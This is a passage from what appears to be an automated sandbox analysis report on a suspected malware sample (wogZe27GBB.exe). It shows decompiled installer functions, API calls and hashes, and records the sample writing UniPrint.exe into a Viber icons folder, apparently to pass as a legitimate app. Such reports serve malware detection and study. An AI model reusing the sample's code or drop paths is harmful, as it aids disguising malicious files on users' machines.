                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                        • 746814C0.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                        • 74681500.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                          • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: 746814$74681500AllocGlobalwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 4143394720-0
                                                                                                        • Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                        • Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
                                                                                                        • Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                        • Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 33%
                                                                                                        			E00401D1B() {
				void* __esi;
				int _t5;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t5 =  *0x407238( *((intOrPtr*)(_t28 - 0x34)), 0x5a, 0x48);
				_t6 =  *0x407040();
				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, _t5));
				 *0x40af84 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af8b = 1;
				 *0x40af88 = _t11 & 0x00000001;
				 *0x40af89 = _t11 & 0x00000002;
				 *0x40af8a = _t11 & 0x00000004;
				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af74);
				_push(_t14);
				_push(_t26);
				E00405AC4();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}












                                                                                                        0x00401d22
                                                                                                        0x00401d29
                                                                                                        0x00401d42
                                                                                                        0x00401d4c
                                                                                                        0x00401d51
                                                                                                        0x00401d5c
                                                                                                        0x00401d63
                                                                                                        0x00401d75
                                                                                                        0x00401d7b
                                                                                                        0x00401d80
                                                                                                        0x00401d8a
                                                                                                        0x004024b8
                                                                                                        0x00401561
                                                                                                        0x00402833
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • 73BBAC50.USER32(?,0000005A,00000048), ref: 00401D22
                                                                                                        • 73BBAD70.GDI32(00000000), ref: 00401D29
                                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                        • CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CreateFontIndirect
                                                                                                        • String ID:
                                                                                                        • API String ID: 3720817429-0
                                                                                                        • Opcode ID: d8d00129a0c809e423feca600faf407eaf54c466d4b244af4f30760ff25f5d33
                                                                                                        • Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
                                                                                                        • Opcode Fuzzy Hash: d8d00129a0c809e423feca600faf407eaf54c466d4b244af4f30760ff25f5d33
                                                                                                        • Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 62%
                                                                                                        			E00402020() {
				intOrPtr* _t49;
				intOrPtr* _t51;
				intOrPtr* _t53;
				intOrPtr* _t55;
				signed int _t59;
				intOrPtr* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t72;
				int _t76;
				signed int _t82;
				intOrPtr* _t89;
				void* _t96;
				void* _t97;
				void* _t101;

				 *(_t101 - 0x30) = E004029F6(0xfffffff0);
				_t97 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t101 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t101 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t101 - 0x44)) = E004029F6(0x45);
				if(E004056C6(_t97) == 0) {
					E004029F6(0x21);
				}
				_push(_t101 + 8);
				_push(0x407374);
				_push(1);
				_push(_t76);
				_push(0x407384);
				if( *0x407284() < _t76) {
					L13:
					 *((intOrPtr*)(_t101 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t49 =  *((intOrPtr*)(_t101 + 8));
					_t96 =  *((intOrPtr*)( *_t49))(_t49, 0x407394, _t101 - 0x34);
					if(_t96 >= _t76) {
						_t53 =  *((intOrPtr*)(_t101 + 8));
						_t96 =  *((intOrPtr*)( *_t53 + 0x50))(_t53, _t97);
						_t55 =  *((intOrPtr*)(_t101 + 8));
						 *((intOrPtr*)( *_t55 + 0x24))(_t55, "C:\\Users\\hardz\\AppData\\Roaming\\ViberPC\\Icons");
						_t82 =  *(_t101 - 0x14);
						_t59 = _t82 >> 0x00000008 & 0x000000ff;
						if(_t59 != 0) {
							_t89 =  *((intOrPtr*)(_t101 + 8));
							 *((intOrPtr*)( *_t89 + 0x3c))(_t89, _t59);
							_t82 =  *(_t101 - 0x14);
						}
						_t60 =  *((intOrPtr*)(_t101 + 8));
						 *((intOrPtr*)( *_t60 + 0x34))(_t60, _t82 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t101 - 8)))) != _t76) {
							_t72 =  *((intOrPtr*)(_t101 + 8));
							 *((intOrPtr*)( *_t72 + 0x44))(_t72,  *((intOrPtr*)(_t101 - 8)),  *(_t101 - 0x14) & 0x000000ff);
						}
						_t63 =  *((intOrPtr*)(_t101 + 8));
						 *((intOrPtr*)( *_t63 + 0x2c))(_t63,  *((intOrPtr*)(_t101 - 0x2c)));
						_t65 =  *((intOrPtr*)(_t101 + 8));
						 *((intOrPtr*)( *_t65 + 0x1c))(_t65,  *((intOrPtr*)(_t101 - 0x44)));
						if(_t96 >= _t76) {
							_t96 = 0x80004005;
							if(MultiByteToWideChar(_t76, _t76,  *(_t101 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
								_t70 =  *((intOrPtr*)(_t101 - 0x34));
								_t96 =  *((intOrPtr*)( *_t70 + 0x18))(_t70, 0x409368, 1);
							}
						}
						_t67 =  *((intOrPtr*)(_t101 - 0x34));
						 *((intOrPtr*)( *_t67 + 8))(_t67);
					}
					_t51 =  *((intOrPtr*)(_t101 + 8));
					 *((intOrPtr*)( *_t51 + 8))(_t51);
					if(_t96 >= _t76) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t101 - 4));
				return 0;
			}




















                                                                                                        0x00402029
                                                                                                        0x00402033
                                                                                                        0x0040203c
                                                                                                        0x00402046
                                                                                                        0x0040204f
                                                                                                        0x00402059
                                                                                                        0x0040205d
                                                                                                        0x0040205d
                                                                                                        0x00402065
                                                                                                        0x00402066
                                                                                                        0x0040206b
                                                                                                        0x0040206d
                                                                                                        0x0040206e
                                                                                                        0x0040207b
                                                                                                        0x0040215b
                                                                                                        0x0040215b
                                                                                                        0x00402162
                                                                                                        0x00402081
                                                                                                        0x00402081
                                                                                                        0x00402092
                                                                                                        0x00402096
                                                                                                        0x0040209c
                                                                                                        0x004020a6
                                                                                                        0x004020a8
                                                                                                        0x004020b3
                                                                                                        0x004020b6
                                                                                                        0x004020c3
                                                                                                        0x004020c5
                                                                                                        0x004020c7
                                                                                                        0x004020ce
                                                                                                        0x004020d1
                                                                                                        0x004020d1
                                                                                                        0x004020d4
                                                                                                        0x004020de
                                                                                                        0x004020e6
                                                                                                        0x004020eb
                                                                                                        0x004020f7
                                                                                                        0x004020f7
                                                                                                        0x004020fa
                                                                                                        0x00402103
                                                                                                        0x00402106
                                                                                                        0x0040210f
                                                                                                        0x00402114
                                                                                                        0x00402126
                                                                                                        0x00402135
                                                                                                        0x00402137
                                                                                                        0x00402143
                                                                                                        0x00402143
                                                                                                        0x00402135
                                                                                                        0x00402145
                                                                                                        0x0040214b
                                                                                                        0x0040214b
                                                                                                        0x0040214e
                                                                                                        0x00402154
                                                                                                        0x00402159
                                                                                                        0x0040216e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402159
                                                                                                        0x00402164
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • 74E2B690.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Roaming\ViberPC\Icons, xrefs: 004020AB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: B690ByteCharMultiWide
                                                                                                        • String ID: C:\Users\user\AppData\Roaming\ViberPC\Icons
                                                                                                        • API String ID: 1541524920-3850056743
                                                                                                        • Opcode ID: 8bdc297386af4af811401e14d97a43bdbeccf624015d579e5e20aa8428512c8b
                                                                                                        • Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
                                                                                                        • Opcode Fuzzy Hash: 8bdc297386af4af811401e14d97a43bdbeccf624015d579e5e20aa8428512c8b
                                                                                                        • Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403978, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00403978(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405ADD(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E00405AC4(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420478, E00405B88(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405B88(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                                        0x0040397c
                                                                                                        0x00403981
                                                                                                        0x00403987
                                                                                                        0x0040398c
                                                                                                        0x0040398c
                                                                                                        0x00403994
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040399c
                                                                                                        0x004039a4
                                                                                                        0x004039a6
                                                                                                        0x004039ac
                                                                                                        0x004039ac
                                                                                                        0x004039ae
                                                                                                        0x004039ba
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004039be
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004039c0
                                                                                                        0x004039c5
                                                                                                        0x004039ce
                                                                                                        0x004039d4
                                                                                                        0x004039d9
                                                                                                        0x004039ed
                                                                                                        0x004039f8
                                                                                                        0x00403a10
                                                                                                        0x00403a16
                                                                                                        0x00403a1b
                                                                                                        0x00403a23
                                                                                                        0x00403a44
                                                                                                        0x00403a44
                                                                                                        0x00403a44
                                                                                                        0x00403a25
                                                                                                        0x00403a27
                                                                                                        0x00403a27
                                                                                                        0x00403a2b
                                                                                                        0x00403a32
                                                                                                        0x00403a32
                                                                                                        0x00403a37
                                                                                                        0x00403a3d
                                                                                                        0x00403a3d
                                                                                                        0x00000000
                                                                                                        0x00403a27
                                                                                                        0x004039db
                                                                                                        0x004039e0
                                                                                                        0x004039e9
                                                                                                        0x004039e2
                                                                                                        0x004039e2
                                                                                                        0x004039e2
                                                                                                        0x004039e0

                                                                                                        APIs
                                                                                                        • SetWindowTextA.USER32(00000000,004236A0), ref: 00403A10
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: TextWindow
                                                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 530164218-1075807775
                                                                                                        • Opcode ID: 9a42cbf8a28c659a92ce9de243ac321228f9f300189a9516546428ecdf00a219
                                                                                                        • Instruction ID: 09623374405f0611f065d620c03919b516a5f167df25bc0d5edc66fe9dc562c0
                                                                                                        • Opcode Fuzzy Hash: 9a42cbf8a28c659a92ce9de243ac321228f9f300189a9516546428ecdf00a219
                                                                                                        • Instruction Fuzzy Hash: F611C2B1B005109BC730DF15D880A73767DEB84716369413BE94167391C77EAE028E58
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404E54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420488 != _t22) {
							 *0x420488 = _t22;
							E00405B66(0x4204a0, 0x424000);
							E00405AC4(0x424000, _t22);
							E0040140B(6);
							E00405B66(0x424000, 0x4204a0);
						}
						L11:
						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004047D3(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F64(0x413);
				return 0;
			}




                                                                                                        0x00404e60
                                                                                                        0x00404e85
                                                                                                        0x00404ea5
                                                                                                        0x00404ea8
                                                                                                        0x00404eab
                                                                                                        0x00404ec2
                                                                                                        0x00404ec8
                                                                                                        0x00404ecf
                                                                                                        0x00404ed6
                                                                                                        0x00404edd
                                                                                                        0x00404ee2
                                                                                                        0x00404ee8
                                                                                                        0x00000000
                                                                                                        0x00404ef8
                                                                                                        0x00404e92
                                                                                                        0x00404ee5
                                                                                                        0x00404ee5
                                                                                                        0x00000000
                                                                                                        0x00404ee5
                                                                                                        0x00404e9e
                                                                                                        0x00404ea0
                                                                                                        0x00000000
                                                                                                        0x00404ea0
                                                                                                        0x00404e66
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404e6d
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • IsWindowVisible.USER32(?), ref: 00404E8A
                                                                                                        • CallWindowProcA.USER32 ref: 00404EF8
                                                                                                          • Part of subcall function 00403F64: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F76
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                        • String ID:
                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                        • Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                        • Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
                                                                                                        • Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                        • Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004024BE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E004024BE(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t6;
				struct _OVERLAPPED* _t10;
				intOrPtr* _t14;
				void* _t16;
				int _t20;

				_t14 = __esi;
				_t10 = __ebx;
				if( *((intOrPtr*)(_t16 - 0x1c)) == __ebx) {
					_t6 = E004029F6(0x11);
					_push(_t6);
					L00405B7C();
				} else {
					E004029D9(1);
					 *0x409f70 = __al;
				}
				if( *_t14 == _t10) {
					L8:
					 *((intOrPtr*)(_t16 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405ADD(_t16 + 8, _t14), " "C:\Users\hardz\AppData\Roaming\ViberPC\Icons\UniPrint.exe"", _t6, _t16 + 8, _t10);
					_t20 = _t5;
					if(_t20 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}









                                                                                                        0x004024be
                                                                                                        0x004024be
                                                                                                        0x004024c1
                                                                                                        0x004024d6
                                                                                                        0x004024db
                                                                                                        0x004024dc
                                                                                                        0x004024c3
                                                                                                        0x004024c5
                                                                                                        0x004024ca
                                                                                                        0x004024d1
                                                                                                        0x004024e3
                                                                                                        0x0040265c
                                                                                                        0x0040265c
                                                                                                        0x004024e9
                                                                                                        0x004024fb
                                                                                                        0x004015a6
                                                                                                        0x004015a8
                                                                                                        0x00000000
                                                                                                        0x004015ae
                                                                                                        0x004015a8
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                        • lstrlen.KERNEL32(00000000,00000011), ref: 004024DC
                                                                                                        • WriteFile.KERNEL32(00000000,?, "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe",00000000,?,?,00000000,00000011), ref: 004024FB
                                                                                                        Strings
                                                                                                        • "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe", xrefs: 004024CA, 004024EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: FileWritelstrlen
                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe"
                                                                                                        • API String ID: 427699356-720294004
                                                                                                        • Opcode ID: b17d70d1d37ace8b3219b3e25872661ee24ef85dcd84733a3d500bda6f130cd4
                                                                                                        • Instruction ID: 2c1f07a632d72534084a5ac00d75746702f795d1104bf50e8da4b719a2e94720
                                                                                                        • Opcode Fuzzy Hash: b17d70d1d37ace8b3219b3e25872661ee24ef85dcd84733a3d500bda6f130cd4
                                                                                                        • Instruction Fuzzy Hash: BCF08972A44245FFD710EBB19E49EAF7668DB00348F14443BB142F51C2D6FC5982976D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040361A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f45c;
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f45c =  *0x41f45c & 0x00000000;
				return _t3;
			}







                                                                                                        0x0040361b
                                                                                                        0x00403623
                                                                                                        0x0040362a
                                                                                                        0x0040362d
                                                                                                        0x0040362d
                                                                                                        0x0040362f
                                                                                                        0x00403634
                                                                                                        0x0040363b
                                                                                                        0x00403641
                                                                                                        0x00403645
                                                                                                        0x00403646
                                                                                                        0x0040364e

                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\wogZe27GBB.exe" ,00000000,74B5F560,004035F1,00000000,0040342D,00000000), ref: 00403634
                                                                                                        • GlobalFree.KERNEL32 ref: 0040363B
                                                                                                        Strings
                                                                                                        • "C:\Users\user\Desktop\wogZe27GBB.exe" , xrefs: 0040362C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                        • String ID: "C:\Users\user\Desktop\wogZe27GBB.exe"
                                                                                                        • API String ID: 1100898210-3155309884
                                                                                                        • Opcode ID: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                        • Instruction ID: 07f203a12dc211ea1540440f4769086933c1ddaa55d0411da1bb29b7fd771b51
                                                                                                        • Opcode Fuzzy Hash: 594683390acbace1feb38ee5af495b240e475f157c4d409b541952378f73dbd9
                                                                                                        • Instruction Fuzzy Hash: 8FE08C32804420ABC6216F55EC0579A7768AB48B22F028536E900BB3A083743C464BDC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004056A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E004056A0(void* __eax, char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_push(_t5);
				L00405B7C();
				_t3 = __eax + _t5;
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                        0x004056a1
                                                                                                        0x004056a5
                                                                                                        0x004056a6
                                                                                                        0x004056ab
                                                                                                        0x004056ad
                                                                                                        0x004056b4
                                                                                                        0x004056bc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004056bc
                                                                                                        0x004056be
                                                                                                        0x004056c3

                                                                                                        APIs
                                                                                                        • lstrlen.KERNEL32(80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\wogZe27GBB.exe,C:\Users\user\Desktop\wogZe27GBB.exe,80000000,00000003), ref: 004056A6
                                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CDE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\wogZe27GBB.exe,C:\Users\user\Desktop\wogZe27GBB.exe,80000000,00000003), ref: 004056B4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrlen
                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                        • API String ID: 2709904686-1669384263
                                                                                                        • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                        • Instruction ID: 6658d1b0ab05e5211e75f0b74aef41c49d7b43cb9628f8e009f88ad9fa15a52a
                                                                                                        • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
